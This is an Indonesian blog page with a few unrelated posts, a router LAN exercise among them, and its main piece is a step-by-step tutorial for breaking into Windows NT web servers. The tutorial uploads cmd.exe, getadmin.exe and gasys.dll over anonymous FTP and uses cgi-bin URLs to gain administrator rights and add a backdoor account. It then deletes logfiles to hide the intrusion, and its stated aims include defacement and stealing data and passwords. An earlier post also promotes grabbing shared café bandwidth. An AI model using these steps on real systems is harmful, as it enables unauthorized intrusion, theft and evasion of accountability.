17).Kalo Instalasi Sukses, Akan Muncul Toolbar tambahan Di Bawah Toolbar Navigasi & Address Bar.
18). Sekarang Browser Mozilla Siap Untuk Digunakan??.
 
:: NOTE ::
-- Software SwitchProxy Tool Versi 1.3.4 Ini selain untuk Mengganti Proxy Secara Otomatis Di Browser Mozilla FireFox, Engine-nya Juga Berpengaruh terhadap Kecepatan Koneksi Internet
-- Cara Ini Sangat Efektif Bila Digunakan Di Warnet Yang Padat Pengunjung untuk Menyedot Bandwidth ( Mayoritas kecepatan akses Internet ) Ke Komputer Yang Sedang Anda Pakai
-- Perubahan Yang Signifikan Terjadi Pada koneksi Internet Dengan BROADBAND / VSAT

Minggu, 03 Mei 2009

TUGAS PE4MROGRAMAN BASIS DATA PAK ARI W

TUGAS PEMROGRAMAN BASIS DATA DENGAN DOSEN BAPAK ARI W
DENGAN VB 6.0 DAN MS ACCESS
TUGAS DAPAT DIDOWNLOAD DISINI

Kelompok2: tugas

Rabu, 21 Januari 2009




IP ADDRESS


SUBNET MASK


DEFAULT GATEWAY

172.10.32.2


255.255.255.0


172.10.32.1

172.10.32.3


255.255.255.0


172.10.32.1
KONFIGURASI LAN A



KONFIGURASI LAN B

IP ADDRESS


SUBNET MASK


DEFAULT GATEWAY

10.10.0.2


255.255.0.0


10.10.0.1

10.10.0.3


255.255.0.0


10.10.0.1

10.10.0.4


255.255.0.0


10.10.0.1

10.10.0.5


255.255.0.0


10.10.0.1


RANCANGAN GAMBAR LAN A DAN LAN B DENGAN SWITCH DAN ROUTER

KONFIGURASI ROUTER


Router>enable

Router#config terminal

Enter configuration commands, one per line. End with CNTL/Z.

Router(config)#int fa 0/0

Router(config-if)#int fa 0/0

Router(config-if)#ip address 172.10.32.1 255.255.255.0

Router(config-if)#no shutdown


%LINK-5-CHANGED: Interface FastEthernet0/0, changed state to up

%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/0, changed state to up

Router(config-if)#int fa0/0

Router(config-if)#int fa0/1

Router(config-if)#int fa0/1

Router(config-if)#ip address 10.10.0.1 255.255.0.0

Router(config-if)#no shutdown

%LINK-5-CHANGED: Interface FastEthernet0/1, changed state to up

%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/1, changed state to up
IP ADDRESS


SUBNET MASK


DEFAULT GATEWAY

172.10.32.2


255.255.255.0


172.10.32.1

172.10.32.3


255.255.255.0


172.10.32.1
KONFIGURASI LAN A



KONFIGURASI LAN B

IP ADDRESS


SUBNET MASK


DEFAULT GATEWAY

10.10.0.2


255.255.0.0


10.10.0.1

10.10.0.3


255.255.0.0


10.10.0.1

10.10.0.4


255.255.0.0


10.10.0.1

10.10.0.5


255.255.0.0


10.10.0.1


RANCANGAN GAMBAR LAN A DAN LAN B DENGAN SWITCH DAN ROUTER

KONFIGURASI ROUTER


Router>enable

Router#config terminal

Enter configuration commands, one per line. End with CNTL/Z.

Router(config)#int fa 0/0

Router(config-if)#int fa 0/0

Router(config-if)#ip address 172.10.32.1 255.255.255.0

Router(config-if)#no shutdown


%LINK-5-CHANGED: Interface FastEthernet0/0, changed state to up

%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/0, changed state to up

Router(config-if)#int fa0/0

Router(config-if)#int fa0/1

Router(config-if)#int fa0/1

Router(config-if)#ip address 10.10.0.1 255.255.0.0

Router(config-if)#no shutdown

%LINK-5-CHANGED: Interface FastEthernet0/1, changed state to up

%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/1, changed state to up

Selasa, 09 Desember 2008

teknik Menjadi Admin Pada Windows NT

teknik Menjadi Admin Pada Windows NT

Wah lagi-lagi sistem operasi windows nih yang jadi korban.Kali ini korban kita adalah Sistem Operasi Windows NT. <--- yang udah bosan dan tahu hentikan bacaan anda sampai disini.

Itulah gambaran kelemahan dari OS Windows, begitu banyak kalangan IT yang telah mengetahuinya selain mudah untuk di Crack sistem operasi ini juga sering menjadi santapan para Script Kiddies dan kabarnya lagi sistem operasi ini menjadi server favorite bagi para Hacker, karena sistem ini sangat gampang untuk dikerjain ( he.he..bukan berarti gue nyarankan lu semua jadi Cracker :)~

Seperti halnya kasus bug Unicode dan CodeRed yang telah menimbulkan bencana besar terhadap server yang berjalan pada sistem operasi windows diseluruh dunia. Maka para admin yang menjalankan sistemnya pada paltform windows ini menjadi kalang kabut bagaikan kambing kebakaran jenggot (mbeee.mbeee..mbeeeeee <-- aduh kacian nih..).

Oke ini hanyalah gambaran dari kasus-kasus yang pernah melanda server yang menggunakan Platform Sistem Operasi windows.

Sekarang marilah kita menjadi penguasa tunggal pada server windows NT, mau tahu caranya ? gampang, namun sebelumnya ikuti dulu sponsor berikut ini:

" PENULIS TIDAK BERTANGGUNG JAWAB ATAS DAMPAK YANG DITIMBULKAN OLEH TUTORIAL INI "

Adapun langkah-langkah persiapan melakukan Crack pada SO windows NT adalah sbb:

==========================

1. Kamu harus memiliki PC (personal Computer) yang terkoneksi ke Internet.

2. Sistem operasi yang digunakan sebaiknya menggunakan SO yang sama dengan korban ( OS Windows NT) kenapa harus menggunakan SO ini..? Karena dengan sistem ini nantinya kita akan gampang untuk mengupload file CMD.EXE dari PC kita dan file ini nantinya akan kita perlukan saat melakukan Crack.

3. Tools-tools pendukung seperti program GetAdmin.exe dan Gasys.dll.

4. Browser seperti IE , Netscape dan NeoPlanet ( NeoPlanet adalah Browser yang digunakan penulis).

Oke setelah persiapan diatas terpenuhi sekarang kita akan melakukan tahap berikutnya yaitu tahap Cracking pada sistem operasi windows NT yang mana tujuan akhir kita adalah untuk mendapatkan password administratornya. Dimana dengan mendapatkan password dari admin ini maka kita akan dapat melakukan apa saja dengan server korban, seperti deface, pencurian data, pencurian password client, dll.

Berikut adalah tahap-tahap dalam melakukan cracking .
============================================



1.Jalankan MS-DOS prompt.

2.Siapkan target yang ingin anda crack, anda dapat mencarinya dengan bantuan search engine seperti google, yahoo, exite, altavista, dan lain-lain. (penulis sendiri lebih senang menggunakan scan engine Operasi Sistem seperti netcraft ).

3. Jalankan FTP anda dengan koneksi tujuan adalah server target dan alangkah baiknya bila anda memiliki program port scanner, karena kita akan mengetahui apakah terget kita akan menjalan kan servis FTP atau tidak. Dan dengan menggunakan program port scanner ini anda dengan mudah nantinya menentukan port-port berapa saja yang terbuka

contoh beberapa port dan nama mesin pengunaan:
---------------------- ----------------------------------------------

Port: Mesin yang bekerja:
====================

21 ftp
22 ssh
23 telnet
80 http
====================



Contoh command dalam melakukan ftp :

C:ftp www.hvd-79.com maka ada pesan :

Connected to www.hvd-79.com 220 medinet microsoft FTP
Service (version 3.0)
User(www.hvd-79.com : (none)): Anonymous (Enter)
Anonymous accses allow, send identify (email name) as
password:

Koneksi ini menjelaskan bahwan nama NetBios dari server adalah medinet. Dan dari sini kita juga akan tahu nama account dari user adalah Anonymous yang digunakan oleh windows NT untuk menjalankan mesin seperti FTP, WWW dan Ghoper pada server tersebut.

Bila saja admin sebelumnya belum pernah mengganti account default pada server tersebut, maka user account internet Anonymousnya adalah IUSR_SATURN.

Sedangkan untuk passwordnya kita hanya perlu memasukan nama email kita atau bisa juga nama email yang kita ciptakan sendiri (coba aja admin@hvd-79.com).

Setelah perintah diatas anda isi semua maka anda sudah diizinkan untuk login pada direktori FTP anda dan silahkan mencoba command cd, dir, untuk masuk dan melihat isi didalam suatu direktori sedangakan perintah put biasanya digunakan oleh para Cracker untuk mengupload atau meletakan trojan pada server korban.

==============================================
Berikut ini saya sertakan juga daftar command yang bisa anda gunakan pada ftp:
==============================================

! delete literal prompt
send
? debug ls put
status
append dir mdelete pwd
trace
ascii disconnect mdir quit
type
bell get mget quote
user
binary glob mkdir recv
verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir

===========================================

Namun disini kita juga harus memahami bahwa tidak semua perintah ftp dapat anda gunakan seperti command "put" command ini pada umumnya dibatasi penggunaannya sebab si Admin yang pintar tidak akan mengijinkan accses write untuk user Anonymous dan bila ini kita paksakan maka hasilnya adalah " acces denied ". Terkadang disini admin yang kurang memperhatikan allow setting servernya maka kita akan dizinkan untuk mengupload file apa saja yang kita inginkan.

Selanjutnya jika anda menemukan direktori cgi-bin maka ini adalah suatu keberuntungan. Segeralah masuk ke direktori cgi-bin tersebut dan siapkan file transfer tipe binary dan cobalah mengupload file CMD.EXE dari disk anda.

Contoh perintahnya sebagai berikut:
============================

ftplcd c:winntsystem32
Local directory now C:winntsystem32.
ftpput cmd.exe
226 transfer complate
208144 byte sent in 0,05 second (4639,7 byte/sec)

Kemudian lakukan hal yang sama untuk mengupload file getadmin.exe dan gasys.dll pada direktori yang sama yaitu cgi-bin.

ftplcd c:winntsystem32
Local directory now C:winntsystem32.
ftpput getadmin.exe
226 transfer complate

dan

ftplcd c:winntsystem32
Local directory now C:winntsystem32
ftpput gasys.dll
226 transfer complate

Setelah semuanya selesai anda upload sekarang kita beralih ke browser dan ketikanlah link dibawah ini:

http://www.hvd-79.com/cgi-bin/getadmin.exe?IUSR_MEDINET



setelah beberapa menit kemudian akan muncul pesan cgi-error dan pada tampilan error tersebut terdapat tambahan :

CGI-ERROR
congratulation , now account IUSER_MEDINET have administrator rights.

Nah sekarang ini artinya account Anonymous anda telah berpangakat sama dengan administartor lokal. Dengan demikian maka anda dapat melakukan apa saja terhadap server yang anda crack tersebut seperti yang saya contohkan tadi (melakukan deface, pencurian data, pencurian password client dll).

Namun untuk menjaga account anda agar tetap awet maka anda saya sarankan untuk membuat accout sendiri , kamu bingung dan tak tahu caranya..? gampang kok..

Untuk membuat account baru pada IE anda inilah contohnya :
===============================================

Dimana contoh : User= ntbaruku dan Password = hvd-79 maka ketikanlah link anda seperti dibawah ini:

http://www.hvd-79.com/ cgi-bin/ cmd.exe?/c+ c:winntsystem32net.exe+ ntbaruku+hvd-79+/add

dan untuk membuat anda sebagai administrator ketiklah pada browser anda sebagai berikut :

http://www.hvd-79.com/cgi-bin/getadmin.exe?ntbaruku

Kemudian clik tombol start dan melalui find cari komputer dengan nama www.HvD-79.com setelah komputer tersebut ditemukan clik kanan mouse anda dan klick explore maka pada saat itu pula akan muncul pertanyaan untuk User dan Password maka isikanlah dengan ( ntbaruku dan hvd-79 ) sebagai user dan passwordnya.Dengan langkah ini maka anda telah menjadi admin benaran.

Upss.. tapi anda jangan senang dulu masih ada pekerjaan yang sangat penting yang harus anda lakukan, pekerjaan apakah itu ? Menghilangkan jejak, ya bila anda ingin menjadi seorang hacker handal anda tidak boleh ceroboh karena setiap perintah yang anda ketikan tadi sewaktu melakukan cracking maka logfiles anda akan tertinggal disana dan ini akan membahayakan diri anda sendiri sebab nomor IP anda akan di rekam disana dan ini dapat dimamfaatkan kembali oleh Admin yang sesungguhnya untuk menuntut serta menangkap anda atas perbuatan penyusupan dan perusakan sistem mereka.

Namun berhubung anda telah menjadi seorang Admin maka segeralah menghapus files-files yang tadi anda upload pada direktori cgi-bin yaitu file cmd.exe, getadmin.exe dan gasys.dll karena anda tidak membutuhkannya lagi.

Tindakan penghapusan files-files tadi adalah untuk memastikan jejak anda tidak tertinggal disana yaitu adanya files (cmd.exe, getadmin.exe dan gasys.dll) pada direktori cgi-bin. Dan untuk menghilangkan seluruh logfiles anda yang tertinggal masuklah kedirektori winntsystem32logfiles <-- segera hapus jejak anda yang tertinggal.

Berikutnya kita juga dapat melakukan cracking dengan seluruh accout client yang tersimpan pada informasi SAM (security Account Manager) yang terdapat pada server target dengan menggunakan program seperti l0phtcrack namun karena keterbatasan waktu penulis hanya membahas sampai disini.

Oke sebagai saran penutup penulis mengakui tutorial ini masih memiliki banyak kekurangan jadi bila ada saran atau kritikan anda bisa menghubungi penulis lewat email : x-d@plasa.com



Regard

By. HvD-79

--------------------------------------------------------------------------------

Referensi : - "Kejahatan Internet Trik Aplikasi dan Trik Penaggulangannya" oleh R.Kresno Aji, Denny Siswanto dan Tommy Chandra Wiratama. Penerbit PT.Elex Media Komputindo Kelompok Gramedia, Jakarta (c) 2002.

- Pengalaman pribadi penulis saat melakukan hacking.
- "Cracking windows NT" www.neworder.box.sk .

Tools : Anda dapat mencari melalui internet dengan menggunakan search engine (yahoo, google, exite, altavista dll) dengan kata kunci "download GetAdmin.exe ", "download Gasys.dll" atau "download l0pthcrack". Bila anda sulit untuk mendapatkannya silahkan hubungi penulis melalui email diatas.